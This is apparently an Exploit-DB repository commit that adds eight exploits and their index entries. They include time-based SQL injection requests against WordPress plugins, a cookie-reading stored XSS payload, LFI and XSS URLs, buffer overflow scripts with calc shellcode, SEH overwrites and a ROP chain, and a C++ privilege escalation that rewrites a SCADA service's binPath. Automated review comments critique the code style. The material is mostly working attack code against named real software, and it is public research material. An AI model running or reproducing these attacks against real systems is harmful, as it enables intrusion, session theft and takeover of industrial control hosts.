DB: 2016-07-08

8 new exploits

WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities
WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities

Codoforum 3.4 - Stored Cross-Site Scripting
MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit
VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)

Core FTP LE 2.2 - Path Field Local Buffer Overflow
OPAC KpwinSQL - Multiple Vulnerabilities
GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation
This commit is contained in:
Offensive Security 2016-07-08 05:06:14 +00:00
parent 52cf6a3185
commit c7daadde64
9 changed files with 433 additions and 0 deletions


@ -36002,6 +36002,8 @@ id,file,description,date,author,platform,type,port
39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
@ -36196,7 +36198,10 @@ id,file,description,date,author,platform,type,port
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Stored Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - .m3u Buffer Overflow Exploit (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
@ -36215,6 +36220,7 @@ id,file,description,date,author,platform,type,port
40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0
40039,platforms/win32/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win32,local,0
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0
40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445
@ -36238,3 +36244,5 @@ id,file,description,date,author,platform,type,port
40065,platforms/jsp/webapps/40065.txt,"OpenFire 3.10.2 - 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,jsp,webapps,80
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0


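--- a/platforms/php/webapps/39806.txt
+++ b/platforms/php/webapps/39806.txt
@@ -0,0 +1,71 @@
+# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
+# Google Dork: inurl:"wp-content/plugins/q-and-a"
+# Date: 12-05-2016
+# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
+# Version: 1.3.9.7 and prior
+# Exploit Author: Gwendal Le Coguic
+# Website: http://10degres.net
+# Category: webapps
+Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
+A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
+The plugin was originally named "Q and A FAQ" and developped by Raygun company
+then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
+##### Full Path Disclosure #####
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
+http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
+##### SQL Injection #####
+Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
+Paramater hdnParentID is vulnerable in two places.
+Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
+1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
+POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 165
+btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
+2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
+POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 84
+btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
+##### References #####
+https://www.owasp.org/index.php/Full_Path_Disclosure
+https://www.owasp.org/index.php/SQL_Injection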

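--- a/platforms/php/webapps/39807.txt
+++ b/platforms/php/webapps/39807.txt
@@ -0,0 +1,62 @@
+# Exploit Title: WordPress plugin Image Gallery Full Path Disclosure and SQL Injection
+# Google Dork: inurl:"wp-content/plugins/gallery-images/"
+# Date: 12-05-2016
+# Software Link: https://fr.wordpress.org/plugins/gallery-images/
+# Version: 1.8.9 and prior
+# Exploit Author: Gwendal Le Coguic
+# Website: http://10degres.net
+# Category: webapps
+##### About #####
+Huge-IT Image Gallery is the best plugin to use if you want to be original with your website.
+##### Full Path Disclosure #####
+http://[target]/wp-content/plugins/gallery-images/gallery-images.php
+##### SQL Injection #####
+Headers X-Forwarded-For and Client-Ip are vulnerable.
+Vulnerable code: at lines 101, 259, 420, 559, 698 the variable $huge_it_ip is missing sanitization
+Payload: 123.123.123.123' AND (SELECT * FROM (SELECT(SLEEP(5)))suRI) AND 'uDsL'='uDsL
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: [target]
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Client-Ip: 123.123.123.123
+X-Forwarded-For: 123.123.123.123
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 89
+action=huge_it_video_gallery_ajax&task=load_images_content&galleryid=1&page=1&perpage=100
+### Extras infos #####
+The "galleryid" must be configured or try another id.
+You don't need to be authed to exploit the injection but the plugin must be enable.
+"task" parameter can be:
+load_images_content
+load_images_lightbox
+load_image_justified
+load_image_thumbnail
+load_blog_view
+Client-Ip overwrite X-Forwarded-For.
+Some system drop those headers.
+##### References #####
+https://www.owasp.org/index.php/Full_Path_Disclosure
+https://www.owasp.org/index.php/SQL_Injection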

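--- a/platforms/php/webapps/40015.txt
+++ b/platforms/php/webapps/40015.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Codoforum v3.4 Stored Cross-Site Scripting (Stored XSS)
+# Google Dork: intext:"powered by codoforum"
+# Date: 01/06/2016
+# Exploit Author: Ahmed Sherif (OffensiveBits)
+# Vendor Homepage: http://codologic.com/page/
+# Software Link: http://codoforum.com/index.php
+# Version: V3.4
+# Tested on: Linux Mint
+1. Description:
+The Reply and search functionalities are both vulnerable to Stored XSS due
+to improper filtration in displaying the content of replies.
+2. Steps to reproduce the vulnerability:
+1. Login to your account.
+2. look for any topic and add a reply .
+3. in the reply textbox add a widely used common keyword within xss
+payload for example : (keyword"><svg/onload=prompt(document.cookie)>)
+4. while any user surfing the topic and started to search for specific
+keywords the javascript code will be executed.
+3. Solution:
+The new version of codoforum will be released this week.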

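--- a/platforms/php/webapps/40068.txt
+++ b/platforms/php/webapps/40068.txt
@@ -0,0 +1,36 @@
+OPAC KpwinSQL LFI/XSS Vulnerabilities
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Product Website : http://www.kpsys.cz/
+Affected version: All
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Description:
+KpwinSQL suffers from an unauthenticated file inclusion vulnerability (LFI) when input passed thru the 'lang' parameter to the following scripts which are not properly verified:
++ index.php
++ help.php
++ logpin.php
++ brow.php
++ indexs.php
++ search.php
++ hledani.php
++ hled_hesl.php
+before being used to include files. This can be exploited to include files from local resources with their absolute path and with directory traversal attacks.
+Moreover, KpwinSQL system suffers from Cross Site Scripting vulnerability when input passed thru the 'vyhl' parameter to 'index.php' script which does not perform input validation.
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Tested on: Apache/2.2.11 (Win32)
+PHP/5.2.9-2
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Vulnerabilities discovered by Yakir Wizman
+https://www.linkedin.com/in/yakirwizman
+Date: 06.07.2016
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+Proof Of Concept:
+Local File Inclusion example:
+http://server/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
+Cross Site Scripting example:
+http://server/index.php?vyhl='><script>alert('XSS')</script>&lang=cze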

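--- a/platforms/windows/dos/40038.py
+++ b/platforms/windows/dos/40038.py
@@ -0,0 +1,33 @@
+'''
+# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC
+# Date: 2016-6-28
+# Exploit Author: Netfairy
+# Vendor Homepage: http://www.coreftp.com/
+# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
+# Version: 2.2
+# Tested on: Windows7 Professional SP1 En x86
+# CVE : N/A
+[+] Type : Buffer overflow
+[+] Detail :
+[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
+[-] enter the application and Input "A"*800 to the path box the press enter
+[-] crash info
+0:008> g
+(4d48.4cc8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000001 ebx=00440770 ecx=00410041 edx=007c4ee4 esi=00000000 edi=01b1efe8
+eip=00410041 esp=0012d6a0 ebp=00410041 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\CoreFTP\coreftp.exe
+coreftp+0x10041:
+00410041 008b45fc8be5 add byte ptr [ebx-1A7403BBh],cl ds:0023:e5d003b5=??
+########generate "A"*800
+'''
+import struct
+junk = "A" * 800
+with open("exp.txt","wb") as f :
+f.write(junk)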
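Review bot: The header line `# Exploit Title: Core FTP Server v2.2 - BufferOverflow POC` names the server product, while the `# Software Link` points at `coreftplite.exe` and the files.csv entry added in this commit describes it as "Core FTP LE 2.2 - Path Field Local Buffer Overflow"; one of the two is wrong and the title should match the index, e.g. `# Exploit Title: Core FTP LE 2.2 - Path Field Local Buffer Overflow (PoC)`. The `[-] Detail` sentence "has the most typical Buffer overflow vulnerabilities" does not say what is overflowed; the path field named on the next line should be stated there. `import struct` is unused in this file and can be dropped.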

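--- a/platforms/windows/local/40017.py
+++ b/platforms/windows/local/40017.py
@@ -0,0 +1,45 @@
+#!/usr/bin/python
+# Exploit Title: Mediacoder 0.8.43.5830 - Buffer Overflow SEH Exploit (.m3u)
+# Date: 25-June-2016
+# Exploit Author: Sibusiso Sishi
+# Email: sibusiso [at] IronSky [dot] co.za
+# Vendor Homepage: http://www.mediacoderhq.com/
+# Software Link: http://www.mediacoderhq.com/getfile.htm?site=mediatronic.com.au/download&file=MediaCoder-0.8.43.5830.exe
+# Version: 0.8.43.5830
+# Tested on: Windows XP SP3 EN
+#msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d\xff' -f c
+shellcode = ("\xda\xca\xbb\x4a\xfa\x8e\x16\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x31\x83\xc2\x04\x31\x5a\x14\x03\x5a\x5e\x18\x7b\xea\xb6\x5e"
+"\x84\x13\x46\x3f\x0c\xf6\x77\x7f\x6a\x72\x27\x4f\xf8\xd6\xcb"
+"\x24\xac\xc2\x58\x48\x79\xe4\xe9\xe7\x5f\xcb\xea\x54\xa3\x4a"
+"\x68\xa7\xf0\xac\x51\x68\x05\xac\x96\x95\xe4\xfc\x4f\xd1\x5b"
+"\x11\xe4\xaf\x67\x9a\xb6\x3e\xe0\x7f\x0e\x40\xc1\xd1\x05\x1b"
+"\xc1\xd0\xca\x17\x48\xcb\x0f\x1d\x02\x60\xfb\xe9\x95\xa0\x32"
+"\x11\x39\x8d\xfb\xe0\x43\xc9\x3b\x1b\x36\x23\x38\xa6\x41\xf0"
+"\x43\x7c\xc7\xe3\xe3\xf7\x7f\xc8\x12\xdb\xe6\x9b\x18\x90\x6d"
+"\xc3\x3c\x27\xa1\x7f\x38\xac\x44\x50\xc9\xf6\x62\x74\x92\xad"
+"\x0b\x2d\x7e\x03\x33\x2d\x21\xfc\x91\x25\xcf\xe9\xab\x67\x85"
+"\xec\x3e\x12\xeb\xef\x40\x1d\x5b\x98\x71\x96\x34\xdf\x8d\x7d"
+"\x71\x2f\xc4\xdc\xd3\xb8\x81\xb4\x66\xa5\x31\x63\xa4\xd0\xb1"
+"\x86\x54\x27\xa9\xe2\x51\x63\x6d\x1e\x2b\xfc\x18\x20\x98\xfd"
+"\x08\x43\x7f\x6e\xd0\xaa\x1a\x16\x73\xb3")
+seh = "\x94\x39\xf0\x64" #0x64f03994 pop ebx # pop esi # ret swscale-3.dll
+nseh = "\xeb\x07\x90\x90" #JMP SHORT to nopsled which leads to the shellcode
+nop_sled = "\x90" * 14
+buff = "http:// "
+buff += "A" * 776
+buff += nseh
+buff += seh
+buff += nop_sled
+buff += shellcode
+buff += "D" * (4216 - (len(shellcode + nop_sled)))
+fo = open("foo.m3u", "wb")
+fo.write (buff)
+fo.close()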
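Review bot: The file handling at the end (`fo = open("foo.m3u", "wb")` / `fo.write (buff)` / `fo.close()`) leaves the handle open if `write` raises, and the space before the call parenthesis is non-idiomatic; the sibling script 40038.py in this same commit already uses the context-manager form, so `with open("foo.m3u", "wb") as fo:` followed by `fo.write(buff)` would match it and close the file on every path. The shebang `#!/usr/bin/python` and the `str`-to-binary write only work under Python 2, which the header does not state; a `# Python 2` note next to `# Tested on:` would save the reader a failed run.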

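--- a/platforms/windows/local/40018.py
+++ b/platforms/windows/local/40018.py
@@ -0,0 +1,88 @@
+#!/usr/bin/env python
+#
+# Exploit Title: VUPlayer <=2.49 .M3u Buffer overflow exploit with DEP bypass
+# Date: 26-06-2016
+# Exploit Author: secfigo
+# Vendor Homepage: http://vuplayer.com/
+# Software Link: https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe
+# Version: VUPlayer <=2.49
+# Tested on: Windows 7 SP1 DEP=alwayson
+# Greetz: Raghu, nullSingapore
+###################################################################################
+import struct
+###################################################################################
+# Shellcode
+# windows/exec CMD=calc.exe with size 227 and bad characters "\x00\x09\x0a\x0d\x1a"
+###################################################################################
+shellcode = ("\xbb\xc7\x16\xe0\xde\xda\xcc\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+"\x33\x83\xc0\x04\x31\x58\x0e\x03\x9f\x18\x02\x2b\xe3\xcd\x4b"
+"\xd4\x1b\x0e\x2c\x5c\xfe\x3f\x7e\x3a\x8b\x12\x4e\x48\xd9\x9e"
+"\x25\x1c\xc9\x15\x4b\x89\xfe\x9e\xe6\xef\x31\x1e\xc7\x2f\x9d"
+"\xdc\x49\xcc\xdf\x30\xaa\xed\x10\x45\xab\x2a\x4c\xa6\xf9\xe3"
+"\x1b\x15\xee\x80\x59\xa6\x0f\x47\xd6\x96\x77\xe2\x28\x62\xc2"
+"\xed\x78\xdb\x59\xa5\x60\x57\x05\x16\x91\xb4\x55\x6a\xd8\xb1"
+"\xae\x18\xdb\x13\xff\xe1\xea\x5b\xac\xdf\xc3\x51\xac\x18\xe3"
+"\x89\xdb\x52\x10\x37\xdc\xa0\x6b\xe3\x69\x35\xcb\x60\xc9\x9d"
+"\xea\xa5\x8c\x56\xe0\x02\xda\x31\xe4\x95\x0f\x4a\x10\x1d\xae"
+"\x9d\x91\x65\x95\x39\xfa\x3e\xb4\x18\xa6\x91\xc9\x7b\x0e\x4d"
+"\x6c\xf7\xbc\x9a\x16\x5a\xaa\x5d\x9a\xe0\x93\x5e\xa4\xea\xb3"
+"\x36\x95\x61\x5c\x40\x2a\xa0\x19\xbe\x60\xe9\x0b\x57\x2d\x7b"
+"\x0e\x3a\xce\x51\x4c\x43\x4d\x50\x2c\xb0\x4d\x11\x29\xfc\xc9"
+"\xc9\x43\x6d\xbc\xed\xf0\x8e\x95\x8d\x97\x1c\x75\x7c\x32\xa5"
+"\x1c\x80")
+junk = "HTTP://" + "A"*1005
+###################################################################################
+# rop gadgets with some modifications
+# bad characters = "\x00\x09\x0a\x0d\x1a"
+###################################################################################
+def create_rop_chain():
+# rop chain generated with mona.py - www.corelan.be
+rop_gadgets = [
+0x10010157, # POP EBP # RETN [BASS.dll]
+0x10010157, # skip 4 bytes [BASS.dll]
+0x10015f77, # POP EAX # RETN [BASS.dll]
+0xfffffdff, # Value to negate, will become 0x00000201
+0x10014db4, # NEG EAX # RETN [BASS.dll]
+0x10032f72, # XCHG EAX,EBX # RETN 0x00 [BASS.dll]
+0x10015f82, # POP EAX # RETN [BASS.dll]
+0xffffffc0, # Value to negate, will become 0x00000040
+0x10014db4, # NEG EAX # RETN [BASS.dll]
+0x10038a6d, # XCHG EAX,EDX # RETN [BASS.dll]
+0x101049ec, # POP ECX # RETN [BASSWMA.dll]
+0x101082db, # &Writable location [BASSWMA.dll]
+0x1001621c, # POP EDI # RETN [BASS.dll]
+0x1001dc05, # RETN (ROP NOP) [BASS.dll]
+0x10604154, # POP ESI # RETN [BASSMIDI.dll]
+0x10101c02, # JMP [EAX] [BASSWMA.dll]
+0x10015fe7, # POP EAX # RETN [BASS.dll]
+0x1060e25c, # ptr to &VirtualProtect() [IAT BASSMIDI.dll]
+0x1001d7a5, # PUSHAD # RETN [BASS.dll]
+0x10022aa7, # ptr to 'jmp esp' [BASS.dll]
+]
+return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+rop_chain = create_rop_chain()
+eip = struct.pack('<L',0x10601033) # RETN (BASSMIDI.dll)
+nops ="\x90"* 16
+buffer = junk + eip + rop_chain + nops+ shellcode+ "C"*(3000-len(junk)-len(eip)-len(rop_chain)-len(nops)-len(shellcode))
+print "[+] Creating .m3u file of size "+ str(len(buffer))
+file = open('vuplayer-dep.m3u','w');
+file.write(buffer);
+file.close();
+print "[+] Done creating the file"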
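Review bot: `file = open('vuplayer-dep.m3u','w');` shadows the Python 2 builtin `file` (and `buffer` two lines earlier shadows the builtin `buffer`), and the three statements end in C-style semicolons that do nothing in Python; `with open('vuplayer-dep.m3u', 'w') as out:` followed by `out.write(buffer)` removes both the shadowing and the unclosed-on-error handle, matching the context-manager form used by 40038.py in this commit. The `print "…"` statements fix the script to Python 2, yet the shebang is the unversioned `#!/usr/bin/env python`; `#!/usr/bin/env python2` or a `# Python 2` note under `# Tested on:` would document that. Inside `create_rop_chain`, `_` as the generator variable is conventionally a throwaway name; `g` or `gadget` reads better.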

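--- a/platforms/windows/local/40069.cpp
+++ b/platforms/windows/local/40069.cpp
@@ -0,0 +1,59 @@
+/*
+# Exploit Title: GE Proficy HMI/SCADA CIMPLICITY 8.2 Local Privilege Escalation Exploit(0 day)
+# Vulnerability Discovery and Exploit Author: Zhou Yu
+# Email: <504137480@qq.com>
+# Version: 8.2
+# Tested on: Windows 7 SP1 X32
+# CVE : None
+Vulnerability Description:
+SERVICE_CHANGE_CONFIG Privilege Escalation
+C:\Users\lenovo\Desktop\AccessChk>accesschk.exe -q -v -c CimProxy
+CimProxy
+Medium Mandatory Level (Default) [No-Write-Up]
+RW Everyone
+SERVICE_ALL_ACCESS
+C:\Users\lenovo\Desktop\AccessChk>sc qc CimProxy
+[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>
+SERVICE_NAME: CimProxy
+TYPE : 10 WIN32_OWN_PROCESS
+START_TYPE : 2 AUTO_START
+ERROR_CONTROL : 1 NORMAL
+BINARY_PATH_NAME : C:\Program Files\Proficy\Proficy CIMPLICITY\exe\Cim
+Proxy.exe
+LOAD_ORDER_GROUP :
+TAG : 0
+DISPLAY_NAME : CIMPLICITY Proxy Service
+DEPENDENCIES :
+SERVICE_START_NAME : LocalSystem
+Usage:
+Put evil.exe and the exploit in the same folder and then run the exploit.
+*/
+#include <windows.h>
+#include <stdio.h>
+#include <string.h>
+void main()
+{
+char szPath[MAX_PATH];
+char *t;
+GetModuleFileName(NULL,szPath,MAX_PATH);
+t = strrchr(szPath, 0x5C);
+t[0] = '\\';
+t[1] = '\0';
+strcat(szPath,"evil.exe\"");
+char t1[] = "\"cmd.exe /c ";
+char payload[] = "sc config CimProxy binPath= ";
+strcat(t1,szPath);
+strcat(payload,t1);
+system(payload);
+//stop service
+printf("stop service!\n");
+system("net stop CimProxy");
+//start service
+printf("start service!\n");
+system("net start CimProxy");
+}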
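Review bot: The header comment shows the root cause in the accesschk output (`RW Everyone` with `SERVICE_ALL_ACCESS` on the CimProxy service, i.e. any local user holds SERVICE_CHANGE_CONFIG) but gives no remediation, which is the one line a defender reading the advisory needs; a `# Fix:` entry under `# Tested on:` stating that the service DACL must be tightened so that non-administrative principals are not granted SERVICE_CHANGE_CONFIG (and that a binPath change on this service is worth alerting on) would close that gap. `void main()` is not a conforming signature in either C or C++; `int main(void)` with a `return 0;` before the closing brace is what the .cpp extension implies. The `sc qc` line reading `[SC] QueryServiceConfig <EFBFBD>ɹ<EFBFBD>` is a mis-decoded localized status string and should be replaced by its English `SUCCESS` equivalent or dropped from the transcript. The `strrchr` result `t` is used without a NULL check; that is an unconditional dereference if the path has no backslash, and the comment should at least say the path returned by `GetModuleFileName` is assumed to be absolute.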